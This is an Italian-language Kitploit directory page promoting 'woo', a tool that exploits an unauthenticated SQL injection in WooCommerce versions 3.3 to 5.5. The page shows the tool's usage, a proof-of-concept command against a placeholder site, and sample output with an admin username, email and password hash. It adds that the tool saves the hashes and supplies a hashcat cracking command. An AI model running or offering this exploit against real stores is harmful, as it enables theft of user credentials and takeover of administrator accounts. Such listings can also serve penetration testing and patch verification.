Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
woo — Exploit woocommerce SQLI and grab user and password hash | Kitploit
Strumenti/GitHubGitHub/randomrobbiebf/woo
Password AttacksExploitationWeb Application ExploitationData ExfiltrationInformation GatheringPenetration Testing
GitHubrandomrobbiebf/woo

woo

Exploit woocommerce SQLI and grab user and password hash

Vedi Repository
215 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Woocommerce 3.3 a 5.5 - SQL Injection non autenticata

https://wpscan.com/vulnerability/1212fec8-1fde-41e5-af70-abdd7ffe5379

Sfrutta la SQLI di WooCommerce e recupera hash utente e password

Comandi

root@kitploit:~
usage: woo.py [-h] [-u URL] [-f FILE] [-p PROXY] [-i WID]

optional arguments:
  -h, --help            show this help message and exit
  -u URL, --url URL     URL to test
  -f FILE, --file FILE  File of urls
  -p PROXY, --proxy PROXY
                        Proxy for debugging
  -i WID, --wid WID     User ID of User

POC

root@kitploit:~
python3 woo.py -u https://www.website.com -i 1
root@kitploit:~
Admin ID: 2
Admin Username: [email protected]
Admin Email Address: [email protected]
Admin Password Hash:$P$BIAtNs11r0CBJZxa3B1JLrFd5C9f7r/

ogni volta che viene eseguito, scrive gli hash in wphash.has e fornisce un comando hashcat per craccarli

Scarica lo strumento